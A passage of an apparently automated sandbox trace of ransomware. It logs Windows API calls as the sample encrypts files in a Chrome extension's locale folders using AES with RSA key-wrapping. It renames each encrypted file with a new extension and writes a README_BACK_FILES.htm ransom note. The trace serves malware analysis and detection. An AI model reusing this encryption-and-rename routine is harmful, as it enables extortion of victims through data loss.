pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.493] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1e3, lpOverlapped=0x0) returned 1 [0262.493] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1e3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1f0) returned 1 [0262.493] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1f0, lpOverlapped=0x0) returned 1 [0262.493] CloseHandle (hObject=0x5d60) returned 1 [0262.493] CloseHandle (hObject=0x5d5c) returned 1 [0262.494] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0262.497] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0262.497] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0262.498] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0262.499] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.499] CryptDestroyKey (hKey=0x2e7d980) returned 1 [0262.499] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.499] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.499] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.499] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0262.499] AreFileApisANSI () returned 1 [0262.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.499] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.500] GetFileType (hFile=0x5d64) returned 0x1 [0262.500] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.501] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.501] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.501] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.501] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.502] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.502] GetLastError () returned 0x0 [0262.502] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json")) returned 0x20 [0262.502] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json", dwFileAttributes=0x80) returned 1 [0262.503] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.503] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.505] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.505] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.507] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.507] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.507] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.507] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.507] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.507] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.507] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73790) returned 1 [0262.507] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73790, dwCertEncodingType=0x1, pInfo=0x2eae120*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae150*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae158*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d980) returned 1 [0262.507] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.508] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e729c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e729c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.508] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e729c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e729c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.508] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.514] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.514] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.520] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.520] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.520] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.520] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.521] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.521] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, 